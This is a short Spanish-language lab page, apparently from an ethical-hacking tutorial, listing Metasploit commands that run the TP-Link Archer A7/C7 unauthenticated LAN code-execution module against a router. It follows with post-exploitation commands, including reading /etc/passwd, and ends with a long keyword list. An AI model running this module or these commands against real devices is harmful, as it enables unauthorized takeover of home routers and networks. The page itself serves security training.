GRÁFRICO del LABORATORIO o TESTEO
COMANDOS UTILIZADOS
Código: Seleccionar todo
use exploits/linux/misc/tplink_archer_a7_c7_lan_rce
show options
set RHOST 192.168.0.1
set LHOST 192.168.0.173
set SRVHOST 192.168.0.173
check
run
Código: Seleccionar todo
id
uname -a
uname -r
cat /proc/version
cat /etc/passwd
D-link Linksys Installation and configuration How to install Instalacion Installation How to use Como usar Como Instalar Como buscar Como Encontrar How to find Remotely Pentesting python perl synology xpenology microsoft windows Security Technologies Nmap Sistema operativo Operating Systems Scanner Remote Remota nstalar Instalación y configuración Install and configure ssh DNS Realizar http https Routing Enrutamiento SOHO NETWORKS Metasploit TP-Link Archer A7 Archer C7 Unauthenticated LAN Remote Code Execution LAN | Local Area Network bypass SQL Injection CMD execution RFI LFI Routers del Hogar Movistar Personal Totalplay Fibra Optica Telmex Vodafone Orange Huawei Wifi Red Inalámbrica
scanner,learn security,unix,ubuntu,debian,OSINT,oscp certification,try hack me,hacking,ethical hacker,ctf for beginners,ehtical hacking,cyber seguridad,security,linux,tool,penetration tests,herramienta,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,bug,exploit,tutorial,proteger computadoras,Information Systems Security Professional,como usar kali linux,LAN,network,Roger Biderbost,comandos,commands,CVE,AC1750,firmware version